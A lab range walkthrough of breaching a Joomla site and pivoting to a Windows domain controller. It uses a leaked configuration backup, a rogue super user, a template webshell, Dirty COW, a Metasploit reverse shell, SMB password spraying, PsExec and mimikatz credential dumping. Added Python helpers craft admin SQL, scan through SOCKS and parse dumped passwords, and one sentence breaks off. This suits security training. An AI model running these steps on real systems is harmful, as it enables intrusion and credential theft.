Preface

This range is a black-box test: no VM account passwords are given. The goal is to work through it blind and obtain the flag on the domain controller.

Environment setup

Attack:

Kali: 192.168.1.10

Range:

CentOS(inside) : 192.168.93.100

CentOS(external) : 192.168.1.110

Ubuntu: 192.168.93.120

Hosts in the domain:

Winserver2012:192.168.93.10

Winserver2008:192.168.93.20

Windows 7:192.168.93.30

Kali can reach the CentOS external address (192.168.1.110).

Procedure

The topology is as follows:

Information gathering

Nmap port probe

Nmap first probes the externally reachable machine (CentOS). Ports 22, 80 and 3306 are open, so the tentative conclusion is that SSH and a web service are running and that the database is MySQL.

nmap -T4 -sC -sV 192.168.1.110

Joomla versions up to 3.4.6 have a well-known unauthenticated remote code execution bug, so the first attempt is simply to run the public exploit against the site.

The exploit fails, which tells us the installed Joomla is newer than the vulnerable range.

A directory scanner run against the site turns up the administrator login page.

This is Joomla's administrator login page. I tried weak passwords against it with Burp Suite but had to give up.

A further scan with dirsearch finds a backup copy of configuration.php.

Looking at its contents, there is a database user and password. Since port 3306 is open, the guess is that this is a backup of the site configuration that the administrator forgot to delete.

Connect to MySQL

Navicat is used to connect to the target machine's database.

You can see that the connection is successful

The next step is to search the data for the administrator account. It has to live in a table with a username field and a password field; after some looking, the umNBT_users table (Joomla gives its tables a random prefix, so the name varies per site) is the one holding the accounts. The problem is that the password column is not plaintext.

Attempts to crack the hash failed.

While searching, I found that although Joomla's documentation does not spell out the password hashing scheme, it does describe, for administrators who have forgotten their password, how to create a new super user by logging in to the database and running SQL statements.

The third item in the VALUES clause of that SQL statement is the password hash. For convenience we use the hash supplied by the documentation, whose corresponding password is secret; any other hash whose plaintext we know would work just as well.

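Rather than reusing the hash from the documentation, the INSERT can be built with a password of your own choosing. The following is an added example, not code from the write-up or from Joomla: it produces Joomla's legacy hash format, md5(password + salt) followed by ':' and the salt, which Joomla 3 still verifies even though it stores new passwords as bcrypt (that is why the documentation's recovery SQL works). The table prefix, the Super Users group id (8 on a default install) and the user and e-mail values are assumptions.

```python
"""Build a Joomla super-user INSERT with a chosen password (added example)."""
import hashlib
import secrets
import string
from typing import Optional

SALT_ALPHABET = string.ascii_letters + string.digits
SUPER_USERS_GROUP_ID = 8  # 'Super Users' on a default Joomla 3 install (assumption)


def make_salt(length: int = 32) -> str:
    """Random alphanumeric salt of the same shape Joomla generates itself."""
    return "".join(secrets.choice(SALT_ALPHABET) for _ in range(length))


def joomla_legacy_hash(password: str, salt: str) -> str:
    """Return the legacy 'md5hex:salt' string Joomla stores for *password*."""
    digest = hashlib.md5((password + salt).encode("utf-8")).hexdigest()
    return f"{digest}:{salt}"


def verify_legacy_hash(password: str, stored: str) -> bool:
    """Check a candidate password against a stored legacy hash.

    Only the 'md5hex:salt' form is handled; bcrypt values ($2y$...) would need
    bcrypt.checkpw and are reported as not matching here.
    """
    if stored.startswith("$") or ":" not in stored:
        return False
    digest, salt = stored.split(":", 1)
    return hashlib.md5((password + salt).encode("utf-8")).hexdigest() == digest


def super_user_sql(prefix: str, username: str, password: str,
                   salt: Optional[str] = None) -> str:
    """Emit the two INSERTs that create a super user.

    *prefix* is the site's random table prefix (read it from configuration.php):
    the user row goes into <prefix>_users, the group mapping into
    <prefix>_user_usergroup_map. The e-mail address is a placeholder.
    """
    salt = salt or make_salt()
    stored = joomla_legacy_hash(password, salt)
    return (
        f"INSERT INTO `{prefix}_users` "
        "(`name`, `username`, `email`, `password`, `params`, "
        "`registerDate`, `lastvisitDate`, `lastResetTime`) VALUES "
        f"('{username}', '{username}', '{username}@example.com', "
        f"'{stored}', '', NOW(), NOW(), NOW());\n"
        f"INSERT INTO `{prefix}_user_usergroup_map` (`user_id`, `group_id`) "
        f"VALUES (LAST_INSERT_ID(), {SUPER_USERS_GROUP_ID});"
    )


if __name__ == "__main__":
    # Prefix taken from the write-up's users table; user and password are ours.
    print(super_user_sql("umNBT", "admin2", "secret"))
```

Paste the printed statements into Navicat (or the mysql client) against the Joomla database; the second INSERT is what actually grants super-user rights, so do not omit it.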

Log in to the Joomla back end

Log in with Admin2 / secret.

Login succeeds. Once in the back end, the usual next step is to find an upload that will accept an image webshell, or somewhere to write a file or run SQL.

A quick search shows that Joomla's back end has a template editor that can write files: Extensions -> Templates -> Templates.

Select the Beez3 template for editing.

Here because the template has a

AntSword connects successfully.

Bypassing disable_functions

On Windows there are few ways to bypass disable_functions; on Linux there are many. They are not covered here.

For convenience I use AntSword's built-in plugin to bypass disable_functions. The bypass script uploads successfully.

I connect directly to the uploaded .antproxy.php. In theory connecting with the original password should let me run commands, but for some reason the response is empty.

So we fall back to the most basic method: upload a py file that bypasses disable_functions and executes system commands passed in as a parameter.

Passing whoami shows that we are the low-privilege www-data user.

ifconfig shows something odd. The CentOS box we scanned was on 192.168.1.0/24, but the interface here is on 192.168.93.0/24, which is confusing at first.

arp -a shows the neighbour table (not the routing table), and every entry is on 192.168.93.0/24.

The established inbound and outbound connections all involve the 93 segment as well.

The static interface configured in /etc/network/interfaces is also on the 93 segment.
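The question being answered here, "is this shell on the host I scanned?", can be settled mechanically from the same three outputs. The following is an added example, not from the write-up: it parses the text of ip -4 addr (or ifconfig) and arp -a (or ip neigh), compares the local addresses and subnets with the address that was attacked, and says whether the shell landed on that host, on a neighbour, or on a back end behind a proxy or NAT. The sample outputs are constructed to match the lab topology; the interface name and MAC addresses are made up.

```python
"""Decide whether a shell runs on the scanned host or behind it (added example)."""
import ipaddress
import re
from dataclasses import dataclass
from typing import List

# Constructed sample output, shaped like `ip -4 addr` and `arp -a` on the web host.
SAMPLE_IP_ADDR = """\
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN
    inet 127.0.0.1/8 scope host lo
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP
    inet 192.168.93.120/24 brd 192.168.93.255 scope global ens33
"""
SAMPLE_ARP = """\
? (192.168.93.100) at 00:0c:29:aa:bb:cc [ether] on ens33
? (192.168.93.10) at 00:0c:29:dd:ee:ff [ether] on ens33
"""

IPV4 = r"(\d{1,3}(?:\.\d{1,3}){3})"
CIDR_RE = re.compile(r"\binet " + IPV4 + r"/(\d{1,2})")                 # ip addr style
IFCONFIG_RE = re.compile(r"\binet " + IPV4 + r"\s+netmask\s+" + IPV4)  # ifconfig style
ARP_A_RE = re.compile(r"\(" + IPV4 + r"\) at ")                         # arp -a
IP_NEIGH_RE = re.compile(r"^" + IPV4 + r" dev ", re.M)                  # ip neigh


@dataclass
class Vantage:
    target: str
    local_addrs: List[str]
    subnets: List[str]
    neighbours: List[str]

    @property
    def target_is_local(self) -> bool:
        return self.target in self.local_addrs

    @property
    def target_in_local_subnet(self) -> bool:
        t = ipaddress.ip_address(self.target)
        return any(t in ipaddress.ip_network(n) for n in self.subnets)


def parse_interfaces(text: str) -> List[ipaddress.IPv4Interface]:
    """Collect non-loopback IPv4 interfaces from ip addr or ifconfig output."""
    entries = [f"{ip}/{mask}" for ip, mask in CIDR_RE.findall(text)]
    entries += [f"{ip}/{mask}" for ip, mask in IFCONFIG_RE.findall(text)]
    ifaces = [ipaddress.ip_interface(e) for e in entries]
    return [i for i in ifaces if not i.ip.is_loopback]


def where_am_i(target: str, ip_output: str, arp_output: str) -> Vantage:
    ifaces = parse_interfaces(ip_output)
    neighbours = set(ARP_A_RE.findall(arp_output)) | set(IP_NEIGH_RE.findall(arp_output))
    return Vantage(
        target=target,
        local_addrs=[str(i.ip) for i in ifaces],
        subnets=sorted({str(i.network) for i in ifaces}),
        neighbours=sorted(neighbours),
    )


def explain(v: Vantage) -> str:
    """One-line verdict a practitioner can read off the shell."""
    nets = ", ".join(v.subnets)
    if v.target_is_local:
        return f"{v.target} is configured here: the shell is on the host that was scanned."
    if v.target_in_local_subnet:
        return f"{v.target} is a neighbour on {nets}, not this host."
    return (f"{v.target} is on no local subnet ({nets}): the shell runs on a back end "
            f"behind a proxy or NAT; hosts on the local segment: {', '.join(v.neighbours)}")


if __name__ == "__main__":
    print(explain(where_am_i("192.168.1.110", SAMPLE_IP_ADDR, SAMPLE_ARP)))
```

On the real box, feed it the live command output (for example via subprocess) instead of the constructed samples; the neighbour list is the first set of pivot candidates, and the 192.168.93.100 entry in the sample is the address the proxy host would show up with.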

Nginx reverse proxy

The address we scanned earlier behaves like a public IP, while the real web host sits on 192.168.93.0/24, an internal segment. An nginx reverse proxy fits this picture best.

Since I had not run into a reverse proxy before, here is a short detour to fill in that gap.

What is a proxy

In the Java proxy design pattern, a proxy object is provided for another object, and the proxy controls access to the original object.

That may not mean much on its own, so a real-life example: say we want to buy a second-hand flat. We could go looking ourselves, but that costs time and effort, and the quality inspection, title transfer and so on would all fall to us as well. The simple, fast option is a letting agency, which already has plenty of listings. We entrust the agency with finding a suitable flat and with the inspection and transfer afterwards; all we do is choose the flat we want and pay.

A proxy, then, is simply someone who does something on our behalf when we do not want to do it directly. In this example the agency is acting as our proxy, because we have entrusted it with finding the flat.

What is a reverse proxy

The difference between a forward proxy and a reverse proxy is which side it stands in for: a forward proxy represents the client, a reverse proxy represents the server.

With a reverse proxy the client is unaware of it and needs no configuration. The client sends its request to the reverse proxy, which picks a back-end server, fetches the response and returns it. From the outside the proxy and the back end look like one server: the proxy's address is exposed, the real server's IP address stays hidden.

Benefits of reverse proxies

So why use a reverse proxy? The reasons are:

1. It protects the real web server. The web server is invisible from outside; only the reverse proxy can be seen, and the proxy holds no real data, so the web server's resources are better protected.

2. It enables static/dynamic separation and load balancing, which lightens the web servers' load and speeds up the site (both are discussed later).

3. It saves scarce IP addresses: all of an organisation's sites can share one Internet-registered address.

With the idea in place, here is how an nginx reverse proxy is set up in practice.

1. Simulate several HTTP servers as back ends. Two Tomcat instances are enough, with their ports changed to 8081 and 8082.

2. Map the host names to the IP address (hosts file):

192.168.72.49 8081.max.com
192.168.72.49 8082.max.com

3. Configure nginx.conf

upstream tomcatserver1 {
    server 192.168.72.49:8081;
}
upstream tomcatserver2 {
    server 192.168.72.49:8082;
}
server {
    listen 80;
    server_name 8081.max.com;
    #charset koi8-r;
    #access_log logs/host.access.log main;
    location / {
        proxy_pass http://tomcatserver1;
        index index.html index.htm;
    }
}
server {
    listen 80;
    server_name 8082.max.com;
    #charset koi8-r;
    #access_log logs/host.access.log main;
    location / {
        proxy_pass http://tomcatserver2;
        index index.html index.htm;
    }
}

Flow: 1) the client requests 8081.max.com, which the hosts entry resolves to 192.168.72.49, so the request arrives at nginx on port 80; 2) nginx matches the server block whose server_name is 8081.max.com; 3) the location block's proxy_pass forwards the request to the upstream tomcatserver1, i.e. the Tomcat on port 8081.

So in this topology a Linux host is clearly acting as a reverse proxy for the Ubuntu machine on the intranet. Looking through the cache directory, I find a mysql folder and take a look inside.

It contains a test.txt. Another account and password that an administrator forgot to delete? (tongue in cheek)

Port 22 was open in the earlier scan, so this credential is probably an SSH account.

SSH connection attempt

The connection to the other Linux host succeeds.

The hostname and IP addresses show that this is not the Ubuntu box from before but CentOS, and that it has two NICs: one on the 192.168.1.0/24 segment we found in the initial scan, the other on the internal 192.168.93.0/24 segment. This Linux host is without doubt the reverse proxy in front of Ubuntu.

Dirty COW privilege escalation

Dirty COW is the obvious first choice for Linux privilege escalation here, so we use it directly.

./dirty 123456    // creates a root-equivalent user whose password is 123456

It runs successfully. The exploit writes a root-equivalent user named firefart into /etc/passwd with the password we supplied, 123456.

Switch to the firefart user to check.

Intranet penetration

Bringing CentOS into MSF

Use the web_delivery module to generate a Linux payload and get a session from CentOS back to MSF.

use exploit/multi/script/web_delivery
set lhost 192.168.1.10
set lport 4444
set target 7
run

Running the module prints a one-line payload to paste on the target. Rerun it with the payload set explicitly:

use exploit/multi/script/web_delivery
set target 7
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.1.10
set lport 4444
exploit

Copy the payload to CentOS and execute it.

The reverse session comes back.

SOCKS proxy into the intranet and scanning

Add a route through the session and start the socks_proxy module so that other tools can reach the intranet.

route add 192.168.93.0 255.255.255.0 1
route print
use auxiliary/server/socks_proxy
set version 4a
run

Add the proxy address and port to /etc/proxychains.conf (the module listens on port 1080 by default, so the entry is socks4 127.0.0.1 1080).

proxychains with nmap would work for the sweep. For convenience I use an MSF module to scan 192.168.93.0/24 through the route instead. On a real engagement lower the thread count, because the traffic is considerable; since this is a lab range I set it to 20.

use auxiliary/scanner/discovery/udp_probe
set rhosts 192.168.93.1-255
set threads 20
run
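For the proxychains-plus-nmap route mentioned above, it helps to know what a tool actually does when it talks to the MSF socks_proxy listener. The following is an added example, not from the write-up: a small TCP connect scanner that speaks SOCKS4 (and SOCKS4a for host names) itself, so it can be pointed straight at the 4a listener without proxychains. It also makes the limitation explicit: through a SOCKS proxy only TCP connects are possible, so no ICMP ping, no SYN scan and no UDP probes like the udp_probe module above (which works only because it runs inside MSF over the session route). The proxy address and the host and port lists are placeholders.

```python
"""TCP connect scan through a SOCKS4/4a proxy such as MSF socks_proxy (added example)."""
import ipaddress
import socket
import struct
from concurrent.futures import ThreadPoolExecutor
from typing import Dict, Iterable, List, Tuple

SOCKS_VERSION = 4
CMD_CONNECT = 0x01
REPLY_GRANTED = 0x5A  # 0x5B..0x5D mean rejected / failed


def build_connect_request(host: str, port: int, userid: bytes = b"") -> bytes:
    """SOCKS4 CONNECT for an IPv4 literal; SOCKS4a form (DSTIP 0.0.0.1 plus a
    trailing NUL-terminated host name) for anything else so the proxy resolves it."""
    try:
        ip = ipaddress.IPv4Address(host)
        return struct.pack("!BBH4s", SOCKS_VERSION, CMD_CONNECT, port, ip.packed) + userid + b"\x00"
    except ipaddress.AddressValueError:
        return (struct.pack("!BBH4s", SOCKS_VERSION, CMD_CONNECT, port, b"\x00\x00\x00\x01")
                + userid + b"\x00" + host.encode("idna") + b"\x00")


def parse_reply(data: bytes) -> bool:
    """8-byte SOCKS4 reply: VN must be 0; CD 0x5A means the proxy connected."""
    if len(data) != 8 or data[0] != 0:
        raise ValueError("malformed SOCKS4 reply")
    return data[1] == REPLY_GRANTED


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            break
        buf += chunk
    return buf


def port_open_via_socks(proxy: Tuple[str, int], host: str, port: int,
                        timeout: float = 3.0) -> bool:
    """True only if the proxy reports the connect succeeded; refused, filtered,
    timed out and proxy-down all collapse to False, as they do for nmap -sT."""
    try:
        with socket.create_connection(proxy, timeout=timeout) as s:
            s.sendall(build_connect_request(host, port))
            return parse_reply(_recv_exact(s, 8))
    except (OSError, ValueError):
        return False


def scan(proxy: Tuple[str, int], hosts: Iterable[str], ports: Iterable[int],
         workers: int = 20) -> Dict[str, List[int]]:
    """Open ports per host. Keep workers low on a real engagement: every
    connect is funnelled through one session on the pivot host."""
    hosts, ports = list(hosts), list(ports)
    results: Dict[str, List[int]] = {h: [] for h in hosts}

    def probe(target: Tuple[str, int]) -> None:
        host, port = target
        if port_open_via_socks(proxy, host, port):
            results[host].append(port)

    with ThreadPoolExecutor(max_workers=workers) as pool:
        list(pool.map(probe, [(h, p) for h in hosts for p in ports]))
    return {h: sorted(p) for h, p in results.items()}


if __name__ == "__main__":
    PROXY = ("127.0.0.1", 1080)  # MSF socks_proxy default listener (assumption)
    TARGETS = ["192.168.93.10", "192.168.93.20", "192.168.93.30"]
    for host, open_ports in scan(PROXY, TARGETS, [88, 135, 139, 389, 445, 1433, 3389]).items():
        print(host, open_ports)
```

Because a SOCKS connect either succeeds or is refused by the proxy, the scanner cannot distinguish closed from filtered ports; nmap through proxychains has the same blind spot, which is why it must be run with -sT -Pn.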

The scan finds three live hosts on the intranet: 192.168.93.10, 192.168.93.20 and 192.168.93.30.

That is not enough information, so nmap is run through proxychains for the details. Through a SOCKS proxy nmap cannot send raw packets, so use a TCP connect scan and skip host discovery:

proxychains nmap -sT -Pn -T4 -sC -sV 192.168.93.10 192.168.93.20 192.168.93.30

Host 10 has ports 88 and 389 open. Anyone who knows these two ports (Kerberos and LDAP) will recognise this host as the domain controller.

Host 20 has a few ordinary ports and, notably, 1433, so it runs MSSQL.

Host 30 has no distinctive ports compared with the other two and is probably an ordinary domain member.

Trying EternalBlue

All three hosts have 139 and 445 open, so the first step is a batch MS17-010 check to see whether any of them can be taken directly with EternalBlue.

None can: on Win7 and 2008 the named pipes the exploit needs are not accessible anonymously, so it cannot be used here.

Password enumeration

Since all three hosts have 445 open, the smb_login module in MSF can be used to enumerate passwords over SMB.

use auxiliary/scanner/smb/smb_login
set rhosts 192.168.93.20
set SMBUser Administrator
set PASS_FILE /tmp/1w.txt
run

We get lucky: the password 123qwe!ASD happens to be in my 1w.txt wordlist.

Lateral movement with PsExec

Use Proxifier to route local tools through the MSF SOCKS proxy.

With the administrator password in hand, open an IPC$ session to host 20 (net use) and copy mimikatz over with the copy command.

Then use PsExec to get a cmd shell, dump credentials with mimikatz and write them to a log.

PsExec64.exe \\192.168.93.20 cmd
mimikatz.exe "log" "privilege::debug" "sekurlsa::logonpasswords" "exit"

Reading mimikatz.log gives the domain admin account: Administrator / zxcASDqw123!!
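Reading the domain admin password off the log by eye works on a lab range; on a real host the log holds dozens of logon sessions and the cleartext entries are scattered across the wdigest and kerberos sections. The following is an added example, not from the write-up: it parses a sekurlsa::logonpasswords log into credential records, skips (null) entries, collapses the same secret reported by several providers, and separates cleartext passwords from NTLM hashes. The log text is constructed to resemble mimikatz output for this lab; the hashes, SIDs and logon ids are made up.

```python
"""Extract credentials from a mimikatz sekurlsa::logonpasswords log (added example)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

# Constructed sample log; values other than the lab's domain admin password are invented.
SAMPLE_LOG = """\
Authentication Id : 0 ; 123456 (00000000:0001e240)
Session           : Interactive from 1
User Name         : Administrator
Domain            : TEST
Logon Server      : WIN-2012
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : TEST
         * NTLM     : 0123456789abcdef0123456789abcdef
         * SHA1     : 0123456789abcdef0123456789abcdef01234567
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : TEST
         * Password : zxcASDqw123!!
        kerberos :
         * Username : Administrator
         * Domain   : TEST
         * Password : zxcASDqw123!!
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : Service from 0
User Name         : WIN2008$
Domain            : TEST
Logon Server      : (null)
        msv :
         [00000003] Primary
         * Username : WIN2008$
         * Domain   : TEST
         * NTLM     : fedcba9876543210fedcba9876543210
        wdigest :
         * Username : WIN2008$
         * Domain   : TEST
         * Password : (null)
        kerberos :
         * Username : win2008$
         * Domain   : test.org
         * Password : (null)
"""

PROVIDER_RE = re.compile(r"^\s*(msv|tspkg|wdigest|kerberos|ssp|credman)\s*:\s*$")
FIELD_RE = re.compile(r"^\s*\*\s*(Username|Domain|Password|NTLM)\s*:\s*(.*?)\s*$")


@dataclass(frozen=True)
class Credential:
    domain: str
    username: str
    kind: str       # 'password' or 'ntlm'
    secret: str
    provider: str   # LSASS package the entry came from (msv, wdigest, kerberos, ...)


def _emit(rec: Dict[str, str], provider: str, out: List[Credential],
          seen: Set[Tuple[str, str, str, str]]) -> None:
    """Turn one '* Username/Domain/Password/NTLM' group into records, deduplicated."""
    user = rec.get("Username")
    if not user:
        return
    domain = rec.get("Domain", "")
    for key, kind in (("Password", "password"), ("NTLM", "ntlm")):
        secret = rec.get(key)
        if not secret or secret == "(null)":
            continue
        dedupe = (domain.lower(), user.lower(), kind, secret)
        if dedupe not in seen:
            seen.add(dedupe)
            out.append(Credential(domain, user, kind, secret, provider))


def parse_mimikatz_log(text: str) -> List[Credential]:
    creds: List[Credential] = []
    seen: Set[Tuple[str, str, str, str]] = set()
    provider, rec = "", {}
    for line in text.splitlines():
        m = PROVIDER_RE.match(line)
        if m:                                  # new provider section: flush and reset
            _emit(rec, provider, creds, seen)
            provider, rec = m.group(1), {}
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue                           # headers, SHA1 lines, blanks
        key, value = m.group(1), m.group(2)
        if key == "Username" and rec:          # second block within the same provider
            _emit(rec, provider, creds, seen)
            rec = {}
        rec[key] = value
    _emit(rec, provider, creds, seen)
    return creds


def cleartext_passwords(creds: List[Credential]) -> List[Credential]:
    return [c for c in creds if c.kind == "password"]


if __name__ == "__main__":
    for c in parse_mimikatz_log(SAMPLE_LOG):
        print(f"{c.domain}\\{c.username}  {c.kind}={c.secret}  ({c.provider})")
```

Machine accounts (names ending in $) usually surface only as NTLM hashes, which is still useful for pass-the-hash even when no cleartext is present; the parser keeps them rather than filtering them out.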

An IPC$ connection with these credentials to host 10, the domain controller of the TEST domain, then succeeds directly.

Use commands to view the sensitive file

dir \\192.168.93.10\C$\users\Administrator\Documents
type \\192.168.93.10\C$\users\Administrator\Documents\flag.txt
